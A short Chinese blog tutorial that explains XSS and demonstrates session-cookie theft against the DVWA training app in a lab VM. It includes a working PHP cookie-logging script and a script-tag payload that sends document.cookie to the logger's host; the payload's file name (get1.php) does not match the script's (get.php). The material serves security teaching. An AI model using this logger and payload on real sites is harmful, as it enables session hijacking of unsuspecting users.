赞
踩
跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。
这里简单的演示下,将cookie获取到自己的搭建DVWA的虚拟机里面。
1.首先写一个获取cookie的脚本 get.php
<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?>
2.将该脚本上传到/var/www/html目录下,和DVWA在同一目录下
3.测试脚本是否可
curl 127.0.0.1/get.php?cookie=shy
4,将构造的XSS的payload插入到DVWA页面
<script>document.location='http://192.168.44.128/get1.php?cookie='+document.cookie;</script>
点击提交后,跳转到空白页面
5,这时去虚拟机里面查看,发现获取到了当前用户的cookie
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。